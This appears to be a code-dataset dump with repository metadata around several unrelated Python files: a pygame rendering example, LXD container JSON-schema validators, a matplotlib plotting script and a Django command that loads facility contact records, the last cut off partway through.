7,0,0,0,0,0,0,0,50,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,7,7,0,0,0,0,0,0,34,26,26,31,0,0,0,51,0,0,0,4,4,0,0,0,0,0,50,0,0,0,0,0,0,0,7,0,7,0,7,0,30,26,26,26,26,27,27,27,27,27,27,27,27,26,28,0,40,0,35,0,51,0,7,
7,51,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,7,7,0,0,50,0,0,51,33,26,26,32,0,0,0,0,0,51,0,4,4,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,30,26,29,29,29,29,29,29,29,29,26,26,26,26,28,51,40,0,40,0,0,0,7,
7,0,0,0,0,0,51,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,7,7,0,0,0,0,0,0,0,33,32,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,50,0,0,0,34,27,27,27,27,27,27,26,28,0,0,0,0,0,0,0,0,30,26,26,26,28,0,40,0,40,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,11,0,0,51,0,0,0,0,0,0,0,0,0,0,51,0,0,0,0,10,4,4,4,4,4,4,4,4,4,0,0,49,4,4,4,4,4,7,7,0,34,31,0,0,0,0,0,0,0,0,0,51,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,0,0,0,0,0,0,0,0,33,29,29,29,32,0,40,0,40,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,11,0,0,51,0,0,0,0,50,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,51,0,0,1,1,1,1,1,7,7,34,26,26,31,0,0,0,0,0,0,51,0,0,0,0,0,0,4,4,51,0,0,51,0,0,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,40,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,7,7,33,26,26,32,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,51,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,0,0,0,0,0,0,0,0,38,39,39,39,39,39,32,0,40,0,0,51,7,
7,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,49,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,7,7,0,33,32,51,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,51,0,30,26,26,26,26,26,26,26,28,0,0,0,0,51,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,7,
7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,"""
if __name__ == '__main__':
if len(sys.argv) > 1:
if sys.argv[1] in EXAMPLES:
locals()[sys.argv[1]](*sys.argv[2:])
else:
print('AVAILABLE EXAMPLES')
for name, desc in EXAMPLES.items():
print('{:10s}: {}'.format(name, desc))
print('\nTry python -m renderpyg.examples example_name parameters')
| 60.532813 | 450 | 0.612736 | 12,072 | 38,741 | 1.946571 | 0.04937 | 0.319333 | 0.389506 | 0.419933 | 0.627559 | 0.610409 | 0.580408 | 0.561088 | 0.540917 | 0.526235 | 0 | 0.332318 | 0.085233 | 38,741 | 639 | 451 | 60.627543 | 0.330766 | 0.03748 | 0 | 0.333333 | 0 | 0.154472 | 0.632348 | 0.58829 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014228 | false | 0 | 0.022358 | 0 | 0.038618 | 0.006098 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c45075bda5a2f71e634dbc4e73ae7e21ccc769b6 | 31 | py | Python | Py_challenge/0.py | paulozava/Python | 2181c668d280b4b925ff819fadb70f4acbb44d1b | [
"Unlicense"
] | 1 | 2018-07-19T13:57:43.000Z | 2018-07-19T13:57:43.000Z | Py_challenge/0.py | paulozava/Python | 2181c668d280b4b925ff819fadb70f4acbb44d1b | [
"Unlicense"
] | 1 | 2018-07-12T16:29:05.000Z | 2018-07-12T16:29:05.000Z | Py_challenge/0.py | paulozava/Python | 2181c668d280b4b925ff819fadb70f4acbb44d1b | [
"Unlicense"
] | null | null | null | def zero ():
return 2 ** 38 | 15.5 | 18 | 0.516129 | 5 | 31 | 3.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 0.322581 | 31 | 2 | 18 | 15.5 | 0.619048 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
c45adbbd1ae3302ad2dfa4897bbb938abf53681a | 7,563 | py | Python | app/api/schemas/container_schema.py | bet4it/lxdui | 48e1e0689c00da42b25e8968be5dfad0f8c57741 | [
"Apache-2.0"
] | 1 | 2022-03-13T12:17:13.000Z | 2022-03-13T12:17:13.000Z | app/api/schemas/container_schema.py | aiminickwong/lxdui | 18d54d6d774bc25d22731fe7eaa6a111b0515ab3 | [
"Apache-2.0"
] | null | null | null | app/api/schemas/container_schema.py | aiminickwong/lxdui | 18d54d6d774bc25d22731fe7eaa6a111b0515ab3 | [
"Apache-2.0"
] | null | null | null | from jsonschema import validate, ValidationError
schema = {
"oneOf": [
{"$ref": "#/definitions/singleObject"}, # plain object
{
"type": "array", # array of plain objects
"items": {"$ref": "#/definitions/singleObject"}
}
],
"definitions": {
"singleObject": {
'type':'object',
'required': ['name', 'image'],
'properties':{
'name':{
'type':'string',
'description':'Container name'
},
'image':{
'type':'string',
'description':'Image alias or hash'
},
'type':{
'type':'string',
'description':'Type of instance'
},
'newName': {
'type': 'string',
'description': 'New Container name'
},
'stateful':{
'type':'boolean',
'description':'Stateful container'
},
'profiles':{
'type':'array',
'items':[
{'type':'string'}
]
},
'network': {
'type': 'array',
'items': [
{'type': 'string'}
]
},
'cpu': {
'type': 'object',
'description': 'CPU Limitation',
'required':['percentage','hardLimitation'],
'properties':{
'percentage':{
'type':'integer',
'description':'Set CPU Limitations',
'minimum':1,
'maximum':100
},
'hardLimitation':{
'type':'boolean',
'description':'Set as hard limitation (soft limitation presumed on false)'
}
}
},
'memory':{
'type': 'object',
'description': 'Memory limitation',
'required': ['sizeInMB', 'hardLimitation'],
'properties': {
'sizeInMB': {
'type': 'integer',
'description': 'Set memory limitation',
'minimum': 32
},
'hardLimitation':{
'type':'boolean',
'description':'Set as hard limitation (soft limitation presumed on false)'
}
}
},
'autostart':{
'type':'boolean',
'description':'autostart instance'
},
'description': {
'type': 'string',
'description': 'Description instance'
}
}
}
}
}
set_cpu_limit_schema = {
"oneOf": [
{"$ref": "#/definitions/singleObject"}, # plain object
{
"type": "array", # array of plain objects
"items": {"$ref": "#/definitions/singleObject"}
}
],
"definitions": {
"singleObject": {
'type':'object',
'required': ['name', 'image'],
'properties':{
'name':{
'type':'string',
'description':'Container name'
},
'image':{
'type':'string',
'description':'Image alias or hash'
},
'type':{
'type':'string',
'description':'Type of instance'
},
'newName': {
'type': 'string',
'description': 'New Container name'
},
'stateful':{
'type':'boolean',
'description':'Stateful container'
},
'profiles':{
'type':'array',
'items':[
{'type':'string'}
]
},
'network': {
'type': 'array',
'items': [
{'type': 'string'}
]
},
'cpu': {
'type': 'object',
'description': 'CPU Limitation',
'required':['percentage','hardLimitation'],
'properties':{
'cores':{
'type':'integer',
'description':'Set the number of CPU cores',
'minimum':1
},
}
},
'memory':{
'type': 'object',
'description': 'Memory limitation',
'required': ['sizeInMB', 'hardLimitation'],
'properties': {
'sizeInMB': {
'type': 'integer',
'description': 'Set memory limitation',
'minimum': 32
},
'hardLimitation':{
'type':'boolean',
'description':'Set as hard limitation (soft limitation presumed on false)'
}
}
},
'autostart':{
'type':'boolean',
'description':'autostart instance'
},
'description': {
'type': 'string',
'description': 'Description instance'
}
}
}
}
}
copyMoveSchema = {
"oneOf": [
{"$ref": "#/definitions/singleObject"}, # plain object
],
"definitions": {
"singleObject": {
'type':'object',
'required': ['newContainer'],
'properties':{
'newContainer':{
'type':'string',
'description':'newContainer (name)'
}
}
}
}
}
exportSchema = {
"oneOf": [
{"$ref": "#/definitions/singleObject"}, # plain object
],
"definitions": {
"singleObject": {
'type':'object',
'required': ['imageAlias'],
'properties':{
'imageAlias':{
'type':'string',
'description':'image (alias)'
}
}
}
}
}
def doValidateImageExport(input):
try:
validate(input, exportSchema)
return None
except ValidationError as e:
return e
def doValidateCloneMove(input):
try:
validate(input, copyMoveSchema)
return None
except ValidationError as e:
return e
def doValidate(input, setCPU = False):
try:
if setCPU:
validate(input, set_cpu_limit_schema)
else:
validate(input, schema)
return None
except ValidationError as e:
return e
| 31.644351 | 102 | 0.344837 | 390 | 7,563 | 6.671795 | 0.194872 | 0.061491 | 0.096849 | 0.047656 | 0.805534 | 0.79362 | 0.79362 | 0.79362 | 0.777863 | 0.744043 | 0 | 0.002541 | 0.531667 | 7,563 | 238 | 103 | 31.777311 | 0.732072 | 0.012826 | 0 | 0.627706 | 0 | 0 | 0.293069 | 0.020914 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012987 | false | 0 | 0.004329 | 0 | 0.04329 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6758251db54d2e02c07dd2a8d4fdbaeb61ef3c0d | 9,345 | py | Python | mattest.py | lj-1996907/lj | 0ecb42bfda4af157d968bda0e712647113a5367d | [
"MIT"
] | null | null | null | mattest.py | lj-1996907/lj | 0ecb42bfda4af157d968bda0e712647113a5367d | [
"MIT"
] | null | null | null | mattest.py | lj-1996907/lj | 0ecb42bfda4af157d968bda0e712647113a5367d | [
"MIT"
] | null | null | null | #导入包
import matplotlib.pyplot as plt
import numpy as np
#支持中文显示
from pylab import *
mpl.rcParams['font.sans-serif'] = ['SimHei']
#创建数据
#x_data = np.linspace(-1, 1, 100)
#y1 = np.sin(x)
#y2 = np.cos(x)
x_data = ['0.01', '0.01', '0.02', '0.02', '0.03', '0.04', '0.04', '0.05', '0.05', '0.06', '0.07', '0.07', '0.08', '0.09', '0.09', '0.10', '0.10', '0.11', '0.12', '0.12', '0.13', '0.13', '0.14', '0.15', '0.15', '0.16', '0.16', '0.17', '0.18', '0.18', '0.19', '0.20', '0.20', '0.21', '0.21', '0.22', '0.23', '0.23', '0.24', '0.24', '0.25', '0.25', '0.26', '0.26', '0.27', '0.27', '0.28', '0.29', '0.29', '0.30', '0.30', '0.31', '0.32', '0.32', '0.33', '0.34', '0.34', '0.35', '0.35', '0.36', '0.37', '0.37', '0.37', '0.38', '0.38', '0.39', '0.40', '0.40', '0.41', '0.41', '0.41', '0.42', '0.43', '0.43', '0.44', '0.45', '0.45', '0.46', '0.46', '0.47', '0.48', '0.48', '0.49', '0.49', '0.50', '0.51', '0.51', '0.52', '0.52', '0.53', '0.54', '0.54', '0.55', '0.55', '0.55', '0.55', '0.56', '0.57', '0.57', '0.57', '0.58', '0.59', '0.59', '0.60', '0.60', '0.61', '0.62', '0.62', '0.63', '0.63', '0.64', '0.65', '0.65', '0.65', '0.66', '0.66', '0.66', '0.66', '0.67', '0.67', '0.68', '0.68', '0.68', '0.69', '0.70', '0.70', '0.70', '0.71', '0.71', '0.71', '0.72', '0.73', '0.73', '0.74', '0.74', '0.74', '0.75', '0.75', '0.76', '0.76', '0.76', '0.77', '0.77', '0.77', '0.77', '0.78', '0.79', '0.79', '0.79', '0.79', '0.80', '0.80', '0.80', '0.80', '0.81', '0.81', '0.81', '0.81', '0.82', '0.82', '0.82', '0.82', '0.83', '0.84', '0.84', '0.84', '0.84', '0.85', '0.85', '0.85', '0.85', '0.85', '0.85', '0.85', '0.86', '0.86', '0.86', '0.86', '0.86', '0.86', '0.86', '0.86', '0.86', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.88', '0.88', '0.88', '0.89', '0.89', '0.89', '0.89', '0.89', '0.90', '0.90', '0.90', '0.90', '0.90', '0.90', '0.90', '0.90', '0.90', '0.91', '0.91', '0.91', '0.91', '0.91', '0.91', '0.91', '0.91', '0.92', '0.93', '0.93', '0.93', '0.93', '0.93', '0.93', '0.93', '0.93', '0.93', '0.93', '0.93', '0.93', '0.93', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96']
y_data = ['1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.97', '0.97', '0.97', '0.97', '0.97', '0.97', '0.97', '0.97', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.97', '0.97', '0.97', '0.97', '0.97', '0.97', '0.97', '0.97', '0.96', '0.95', '0.95', '0.95', '0.95', '0.95', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.95', '0.95', '0.95', '0.95', '0.94', '0.94', '0.94', '0.93', '0.92', '0.92', '0.92', '0.92', '0.92', '0.91', '0.91', '0.91', '0.90', '0.91', '0.91', '0.90', '0.90', '0.90', '0.90', '0.90', '0.90', '0.90', '0.90', '0.90', '0.89', '0.89', '0.89', '0.89', '0.89', '0.89', '0.88', '0.88', '0.88', '0.88', '0.87', '0.87', '0.87', '0.87', '0.87', '0.86', '0.86', '0.86', '0.85', '0.85', '0.84', '0.84', '0.84', '0.84', '0.83', '0.83', '0.84', '0.84', '0.83', '0.83', '0.83', '0.82', '0.82', '0.81', '0.81', '0.81', '0.80', '0.81', '0.80', '0.80', '0.79', '0.79', '0.78', '0.78', '0.77', '0.77', '0.77', '0.77', '0.76', '0.76', '0.76', '0.75', '0.75', '0.74', '0.74', '0.74', '0.73', '0.73', '0.73', '0.73', '0.72', '0.72', '0.71', '0.71', '0.71', '0.70', '0.70', '0.70', '0.69', '0.69', '0.69', '0.68', '0.68', '0.68', '0.68', '0.68', '0.68', '0.68', '0.68', '0.67', '0.67', '0.67', '0.67', '0.67', '0.66', '0.66', '0.66', '0.65', '0.65', '0.65', '0.65', '0.65', '0.65', '0.65', '0.64', '0.64', '0.64', '0.64', '0.64', '0.64', '0.64', '0.64', '0.63', '0.63', '0.63', '0.63', '0.62', '0.62', '0.62', '0.62', '0.62', '0.61', '0.61', '0.61', '0.61', '0.61', '0.61', '0.60', '0.60', '0.60', '0.60', '0.59', '0.59', '0.59', '0.59', '0.59', '0.58', '0.58', '0.58', '0.58', '0.57', '0.57', '0.57', '0.57', '0.57', '0.56', '0.56', '0.56', '0.56', '0.56', '0.55', '0.55', '0.55', '0.55', '0.55', '0.54', '0.54', '0.54', '0.54', '0.54', '0.53', '0.53', '0.53', '0.53', '0.53', '0.53', '0.53', '0.52', '0.52', '0.52', '0.52', '0.52', '0.52', '0.51', '0.51', '0.51', '0.51', '0.51', '0.50', '0.50', '0.50', '0.50', '0.50', '0.50', '0.50', '0.49', '0.49', '0.49', '0.49', '0.49', '0.49', '0.48', '0.48', '0.48', '0.48', '0.48', '0.48', '0.48', '0.47', '0.47', '0.47', '0.47', '0.47', '0.47', '0.47', '0.46', '0.46', '0.46', '0.46', '0.46', '0.46', '0.46', '0.45', '0.45', '0.45', '0.45', '0.45', '0.45', '0.45', '0.45', '0.44', '0.44', '0.44', '0.44', '0.44', '0.44', '0.44', '0.44', '0.43', '0.43', '0.43', '0.43', '0.43', '0.43', '0.43', '0.43', '0.43', '0.43', '0.42', '0.42', '0.42', '0.42', '0.42', '0.42', '0.42', '0.42', '0.42', '0.41', '0.41', '0.41', '0.41', '0.41', '0.41', '0.41', '0.41', '0.41', '0.40', '0.40', '0.40', '0.40', '0.40', '0.40', '0.40', '0.40', '0.40', '0.40', '0.39', '0.39', '0.39', '0.39', '0.39', '0.39', '0.39', '0.39', '0.39', '0.39', '0.39', '0.39', '0.39', '0.38', '0.38', '0.38', '0.38', '0.38', '0.38', '0.38', '0.38', '0.38', '0.38', '0.38', '0.37', '0.38', '0.37', '0.37', '0.37', '0.37', '0.37', '0.37', '0.37', '0.37', '0.37', '0.37', '0.37', '0.37', '0.36', '0.36', '0.36', '0.36', '0.36', '0.36', '0.36', '0.36', '0.36', '0.36', '0.36', '0.36', '0.35', '0.35', '0.35', '0.35', '0.35', '0.35', '0.35', '0.35', '0.35', '0.35', '0.35', '0.35', '0.35', '0.34', '0.34', '0.34', '0.34', '0.34', '0.34', '0.34', '0.34', '0.34', '0.34', '0.34', '0.34', '0.34', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.32', '0.32', '0.32', '0.32', '0.32', '0.32', '0.32', '0.32', '0.32', '0.32', '0.32', '0.32', '0.32', '0.32', '0.32', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.29']
#创建figure窗口
plt.figure(num=3, figsize=(5, 5))
#设置坐标轴范围
plt.xlim((-0.1, 1.1))
plt.ylim((-0.1, 1.1))
#设置坐标轴名称
plt.xlabel('xxxxxxxxxxx')
plt.ylabel('yyyyyyyyyyy')
#设置坐标轴刻度
my_x_ticks = np.arange(0, 1.1, 0.2)
my_y_ticks = np.arange(0, 1.1, 0.2)
plt.xticks(my_x_ticks)
plt.yticks(my_y_ticks)
#画曲线1
#plt.plot(x, y1)
plt.plot(x_data,y_data,color='red',linewidth=2.0,linestyle='-')
#画曲线2
#plt.plot(x, y2, color='blue', linewidth=5.0, linestyle='--')
#显示出所有设置
plt.show()
| 217.325581 | 4,314 | 0.395292 | 2,282 | 9,345 | 1.613059 | 0.069676 | 0.110839 | 0.146699 | 0.216789 | 0.833741 | 0.784298 | 0.784298 | 0.703613 | 0.693833 | 0.63461 | 0 | 0.400737 | 0.128411 | 9,345 | 42 | 4,315 | 222.5 | 0.051197 | 0.02076 | 0 | 0 | 0 | 0 | 0.4785 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.176471 | 0 | 0.176471 | 0 | 0 | 0 | 1 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
677fcaae7378b64be86f84466e5e40226a65f839 | 11,354 | py | Python | data/management/commands/load_facility_contacts.py | uonafya/mfl_api | 379310b9b56cde084620f1f2dbfe4c6d7c1de47b | [
"MIT"
] | null | null | null | data/management/commands/load_facility_contacts.py | uonafya/mfl_api | 379310b9b56cde084620f1f2dbfe4c6d7c1de47b | [
"MIT"
] | null | null | null | data/management/commands/load_facility_contacts.py | uonafya/mfl_api | 379310b9b56cde084620f1f2dbfe4c6d7c1de47b | [
"MIT"
] | 4 | 2018-07-26T05:53:06.000Z | 2021-07-17T14:30:09.000Z | import os
import json
from common.models import Contact, ContactType
from facilities.models import (
Facility, FacilityContact, Officer, OfficerContact
)
from users.models import MflUser
from django.core.management import BaseCommand
from django.conf import settings
system_user = MflUser.objects.get(email='system@ehealth.or.ke')
class Command(BaseCommand):
def handle(self, *args, **kwargs):
# facility email contacts
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/email/0018_facility_emails_contacts.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
email_type = ContactType.objects.get(name='EMAIL')
for record in records:
conact = record.get('contact')
contact, created = Contact.objects.get_or_create(
contact=conact,
contact_type=email_type
)
# facility email contacts linked
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/email/0019_facility_emails_contacts_linked.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
mobile_type = ContactType.objects.get(name='EMAIL')
for record in records:
contact = record.get('contact').get('contact')
contact, created = Contact.objects.get_or_create(
contact=contact,
contact_type=mobile_type
)
facility = record.get('facility').get('code')
try:
facility_obj = Facility.objects.get(code=facility)
print FacilityContact.objects.get_or_create(
contact=contact, facility=facility_obj,
created_by=system_user, updated_by=system_user)
except Facility.DoesNotExist:
print "The requested facility does not exist"
# officer email contacts
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/email/0030_officer_email_contacts.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
email_type = ContactType.objects.get(name='EMAIL')
for record in records:
conact = record.get('contact')
contact, created = Contact.objects.get_or_create(
contact=conact,
contact_type=email_type
)
# officer email linked
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/email/0031_officer_email_contacts_linked.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
email_type = ContactType.objects.get(name='EMAIL')
for record in records:
contact = record.get('contact').get('contact')
contact, created = Contact.objects.get_or_create(
contact=contact,
contact_type=email_type
)
officer = record.get('officer')
if officer:
officer = officer.get('name')
try:
officer_obj = Officer.objects.filter(name=officer)
print OfficerContact.objects.get_or_create(
contact=contact, officer=officer_obj[0],
created_by=system_user, updated_by=system_user)
except IndexError:
print "The requested officer does not exist"
else:
print "Officer key is missing"
# facility fax contacts
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/fax/0022_facility_fax_contacts.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
email_type = ContactType.objects.get(name='FAX')
for record in records:
conact = record.get('contact')
contact, created = Contact.objects.get_or_create(
contact=conact,
contact_type=email_type
)
# facility fax contacts linked
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/fax/0023_facility_fax_contacts_linked.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
mobile_type = ContactType.objects.get(name='FAX')
for record in records:
contact = record.get('contact').get('contact')
contact, created = Contact.objects.get_or_create(
contact=contact,
contact_type=mobile_type
)
facility = record.get('facility').get('code')
try:
facility_obj = Facility.objects.get(code=facility)
print FacilityContact.objects.get_or_create(
contact=contact, facility=facility_obj,
created_by=system_user, updated_by=system_user)
except Facility.DoesNotExist:
print "The requested facility does not exist"
# facility landline contacts
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/landline/0020_facility_landline_contacts.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
email_type = ContactType.objects.get(name='LANDLINE')
for record in records:
conact = record.get('contact')
contact, created = Contact.objects.get_or_create(
contact=conact,
contact_type=email_type
)
# facility landline contacts linked
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/landline/0021_facility_landline_contacts_linked.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
mobile_type = ContactType.objects.get(name='LANDLINE')
for record in records:
contact = record.get('contact').get('contact')
contact, created = Contact.objects.get_or_create(
contact=contact,
contact_type=mobile_type
)
facility = record.get('facility').get('code')
try:
facility_obj = Facility.objects.get(code=facility)
print FacilityContact.objects.get_or_create(
contact=contact, facility=facility_obj,
created_by=system_user, updated_by=system_user)
except Facility.DoesNotExist:
print "The requested facility does not exist"
# facility mobile contacts
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/mobile/0024_facility_mobile_contacts.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
email_type = ContactType.objects.get(name='MOBILE')
for record in records:
conact = record.get('contact')
contact, created = Contact.objects.get_or_create(
contact=conact,
contact_type=email_type
)
# facility mobile contacts linked
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/mobile/0025_facility_mobile_contacts_linked.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
mobile_type = ContactType.objects.get(name='MOBILE')
for record in records:
contact = record.get('contact').get('contact')
contact, created = Contact.objects.get_or_create(
contact=contact,
contact_type=mobile_type
)
